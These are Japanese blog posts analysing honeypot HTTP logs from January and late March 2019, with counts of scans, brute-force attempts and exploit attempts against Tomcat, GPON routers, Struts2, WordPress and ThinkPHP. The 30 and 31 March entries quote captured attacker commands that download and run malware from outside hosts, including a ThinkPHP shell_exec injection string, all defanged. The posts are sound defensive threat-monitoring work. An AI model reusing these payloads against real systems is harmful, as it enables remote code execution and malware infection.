ハニーポットのログ分析まとめ(2019年01月度)
2019年01月度のWOWHoneypotのログ分析まとめです。
※先月分:ハニーポットのログ分析まとめ(2018年12月度) - S-Owl
<前提>
以前はプライベートSOCで監視を行っており、自組織を狙ったものか広く一般を狙ったものかを区別したく、広く一般を狙った通信を監視する為に業務と同じくhttpの通信をハニーポットで観測していま、した。
今は目的については再検討中です。
■スペック
台数:1台
ソフトウェア:WOWHoneypot
対象ポート:80/tcp
設置IP:日本のIP
ドメイン:10月取得済、未公開
運用:2018/6/5から開始
■日次のアクセス数
1ヶ月間の総アクセス数:20,034件 (前月:19,873件)
■アクセスパス
1ヶ月間のメソッド+パスの種類は計627種類(前月:661種類)でした。
アクセスパスから攻撃種別を分類し、種別毎のアクセス数を算出したリストのTop10は以下です。(通常アクセス除く)
なお、アクセスパスのtop20は以下です。
順位 | 種別 | リクエスト | 件数 |
1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html | 6019 |
2 | アクセス | GET / | 832 |
3 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ | 289 |
4 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action | 192 |
5 | phpのWebShell設置の調査 | POST /confg.php | 134 |
6 | phpのWebShell設置の調査 | POST /qq.php | 132 |
7 | phpのWebShell設置の調査 | POST /1.php | 117 |
8 | phpのWebShell設置の調査 | POST /test.php | 88 |
9 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php | 87 |
10 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php | 85 |
11 | phpのWebShell設置の調査 | POST /conflg.php | 85 |
12 | phpMyAdminの調査 | GET /admin/phpMyAdmin/index.php | 83 |
13 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php | 82 |
14 | phpのWebShell設置の調査 | GET /cmd.php | 82 |
15 | phpMyAdminの調査 | GET /phpMyAdmin/index.php | 81 |
16 | phpのWebShell設置の調査 | GET /shell.php | 81 |
17 | phpのWebShell設置の調査 | POST /q.php | 79 |
18 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php | 76 |
19 | phpのWebShell設置の調査 | POST /s.php | 76 |
20 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php | 73 |
■送信元IP
送信元IPは1173件(前月:1049件)です。
アクセスがあったIPを地図にマッピングすると以下になります。
このうち、日本にポイントされているものですが、GPONの脆弱性を調査するものだったため、ウイルス感染の可能性あり、としてISPのAbuse窓口宛に連絡しています。
■ドメイン名でのアクセス
10月から取得しているドメイン名に対してのアクセスです。取得はしていますが、特段公開等はしていないものです。
前月同様WordPress関連が多いです。
path | 件数 |
/ | 99 |
/robots.txt | 36 |
/wordpress/wp-config.php~ | 2 |
/wp-login.php | 2 |
//wp-login.php | 1 |
//xmlrpc.php | 1 |
/?author=1 | 1 |
/ads.txt | 1 |
/images/ | 1 |
/joomla/ | 1 |
/new/wp-admin/ | 1 |
/site/wp-admin/ | 1 |
/sitemap.xml | 1 |
/temp/wp-admin/ | 1 |
ハニーポットのログ分析(2019/03/31)
WOWhoneypotの2019/03/31(日) (運用297日目)の簡易分析です。
本日の総アクセス件数は46件です。送信元IP数は28IPです。
本日の主なアクセスは以下です。
・ WordPressの調査:18 件
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:4 件
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:2 件
・ ThinkPHPの脆弱性を突いた攻撃:1 件
本日のドメイン名でのアクセスは以下です。
3 GET /
1 HEAD /
1 GET /robots.txt
本日のハンティングログは以下です。1つ目はThinkPHP、それ以外はStruts2によるものです。
1 2019-03-31 wget hxxp://82.212.70[.]218/a_thk.sh
1 2019-03-31 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 2019-03-31 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2019-03-31 wget -c hxxp://103.55.13[.]68:13333/Linux.TF
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
19 | 2019/3/31 | アクセス | GET / |
4 | 2019/3/31 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
2 | 2019/3/31 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
2 | 2019/3/31 | WordPressの調査 | GET /news/wp-login.php |
2 | 2019/3/31 | WordPressの調査 | GET /news//wp-json/wp/v2/users/ |
2 | 2019/3/31 | WordPressの調査 | GET /news//?author=1 |
2 | 2019/3/31 | WordPressの調査 | GET /blog3/wp-login.php |
2 | 2019/3/31 | WordPressの調査 | GET /blog3//wp-json/wp/v2/users/ |
2 | 2019/3/31 | WordPressの調査 | GET /blog3//?author=1 |
2 | 2019/3/31 | WordPressの調査 | GET /blog2/wp-login.php |
2 | 2019/3/31 | WordPressの調査 | GET /blog2//wp-json/wp/v2/users/ |
2 | 2019/3/31 | WordPressの調査 | GET /blog2//?author=1 |
1 | 2019/3/31 | 調査 | HEAD / |
1 | 2019/3/31 | クローリング | GET /robots.txt |
1 | 2019/3/31 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=wget%20hxxp://82.212.70.218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
以上です。
ハニーポットのログ分析(2019/03/30)
WOWhoneypotの2019/03/30(土) (運用297日目)の簡易分析です。
本日の総アクセス件数は1416件です。送信元IP数は315IPです。
本日の主なアクセスは以下です。
・ WordPressの調査:915 件
・ WordPressのログイン試行攻撃:444 件
→本日も分散ブルートフォースがありました。275IPから来ていました。
・(新規)onexs社のSPA-2012の調査
→来ていたのは以下、2つのパスです。
「GET /dms/spa2102/spa2102.xml」
「GET /dms/spa2102/2102.xml」
調べてみるとonexs社のBusiness Pro Spa 2102という機種がありました。恐らくはLinksys SPA 2102のOEM製品などかと思われます。
「User-Agent: Cisco」でした。
(参考):https://adoc.tips/business-pro-configuration-guide-spa-2102.html
本日のドメイン名でのアクセスは以下です。
4 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
1 2019-03-30 explorer&wp-submit=Log In&redirect_to=hxxp://210.140.82.234/wp-admin/
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
449 | 2019/3/30 | WordPressの調査 | GET /wp-login.php |
445 | 2019/3/30 | WordPressの調査 | POST /wp-login.php |
444 | 2019/3/30 | WordPressのログイン試行攻撃 | POST /xmlrpc.php |
42 | 2019/3/30 | アクセス | GET / |
2 | 2019/3/30 | WordPressの調査 | GET /shop/wp-login.php |
2 | 2019/3/30 | WordPressの調査 | GET /shop//wp-json/wp/v2/users/ |
2 | 2019/3/30 | WordPressの調査 | GET /shop//?author=1 |
2 | 2019/3/30 | WordPressの調査 | GET /forum/wp-login.php |
2 | 2019/3/30 | WordPressの調査 | GET /forum//wp-json/wp/v2/users/ |
2 | 2019/3/30 | WordPressの調査 | GET /forum//?author=1 |
2 | 2019/3/30 | onexs社のSPA-2012の調査 | GET /dms/spa2102/spa2102.xml |
2 | 2019/3/30 | onexs社のSPA-2012の調査 | GET /dms/spa2102/2102.xml |
2 | 2019/3/30 | WordPressの調査 | GET /blog/wp-login.php |
2 | 2019/3/30 | WordPressの調査 | GET /blog//wp-json/wp/v2/users/ |
2 | 2019/3/30 | WordPressの調査 | GET /blog//?author=1 |
1 | 2019/3/30 | WordPressの調査 | GET /vlog/wp-login.php |
1 | 2019/3/30 | WordPressの調査 | GET /vlog//wp-json/wp/v2/users/ |
1 | 2019/3/30 | WordPressの調査 | GET /vlog//?author=1 |
1 | 2019/3/30 | Apache Mod_Statusモジュール利用の調査 | GET /server-status |
1 | 2019/3/30 | クローリング | GET /robots.txt |
1 | 2019/3/30 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
1 | 2019/3/30 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
1 | 2019/3/30 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
1 | 2019/3/30 | 不正中継の調査 | GET hxxp://www.123cha.com |
1 | 2019/3/30 | 不正中継の調査 | GET hxxp://api.ipify.org/ |
1 | 2019/3/30 | 不正中継の調査 | GET hxxp://112.35.66.7:8088/index.php |
1 | 2019/3/30 | 不正中継の調査 | CONNECT www.baidu.com:443 |
1 | 2019/3/30 | 不正中継の調査 | CONNECT www.baidu.com |
1 | 2019/3/30 | 不正中継の調査 | CONNECT cn.bing.com:443 |
以上です。